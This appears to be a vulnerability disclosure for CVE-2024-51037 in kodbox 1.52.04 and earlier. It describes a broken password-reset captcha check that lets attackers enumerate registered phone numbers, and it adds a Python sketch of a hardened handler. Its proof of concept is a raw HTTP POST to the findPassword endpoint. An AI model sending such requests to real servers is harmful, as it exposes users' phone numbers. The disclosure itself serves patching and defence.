Tommonkey


CVE-2024-51037 Disclosed

kodbox v.1.52.04 and before allows a remote attacker to obtain sensitive information via the captcha feature in the password reset function.

Vulnerability Type

Incorrect Access Control

Vendor of Product

https://github.com/kalcaddle/kodbox

Affected Product Code Base

kodbox - <=1.52.04

Affected Component

The captcha check in the password reset function is broken: the verification passes with any msgCode value. Because the response message then differs for registered and unregistered phone numbers, an attacker can use the endpoint to determine which phone numbers belong to registered users.
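As an added illustration, not part of the original advisory and not kodbox's own code: a small Python model of the two defects side by side with a hardened handler that checks the SMS code first and answers identically whether or not the phone is registered. The user store, the pending-code store and the function names are assumptions made for this example.

```python
import hmac
import secrets
import time

# Constructed sample data: placeholder phone numbers, not real accounts.
REGISTERED_PHONES = {"13800000001", "13800000002"}

# Server-side store of pending SMS codes: phone -> (code, expiry).
# Assumed design for this example, not kodbox's implementation.
PENDING_CODES = {}


def issue_code(phone, ttl=300, now=None):
    """Generate a one-time 6-digit code for a phone and remember it server-side."""
    now = time.time() if now is None else now
    code = f"{secrets.randbelow(10**6):06d}"
    PENDING_CODES[phone] = (code, now + ttl)
    return code


def request_code(phone, now=None):
    """Step 1 of the flow: every request gets the same acknowledgement."""
    if phone in REGISTERED_PHONES:
        issue_code(phone, now=now)  # SMS delivery is out of scope here
    return {"code": True, "data": "If the phone is registered, a code was sent."}


def weak_find_password(phone, msg_code):
    """Model of the flawed behaviour the advisory describes: msgCode is never
    compared, and the reply depends only on whether the phone exists."""
    if phone not in REGISTERED_PHONES:
        return {"code": False, "data": "user not found"}
    return {"code": True, "data": "verified"}


def hardened_find_password(phone, msg_code, now=None):
    """Step 2: verify the code before anything else, with one failure reply for
    every case (no pending code, expired, or wrong), so a caller without a valid
    code learns nothing about the phone's registration status."""
    now = time.time() if now is None else now
    failure = {"code": False, "data": "invalid or expired code"}
    entry = PENDING_CODES.pop(phone, None)  # single use, consumed even on failure
    if entry is None:
        return failure
    code, expires = entry
    if now > expires or not hmac.compare_digest(code, str(msg_code)):
        return failure
    return {"code": True, "data": "verified"}
```

Consuming the pending code on a failed attempt also caps guessing at one try per issued code, which a rate limit on request_code should complement.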

POC

POST /?user/index/findPassword HTTP/1.0
Host: *****.com
Cookie: KOD_SESSION_ID=23092fc6598c0272f492e3dbf5374777; CSRF_TOKEN=duGCGZM93X5Gj8Wv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 41
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

type=phone&input=phone&msgCode=code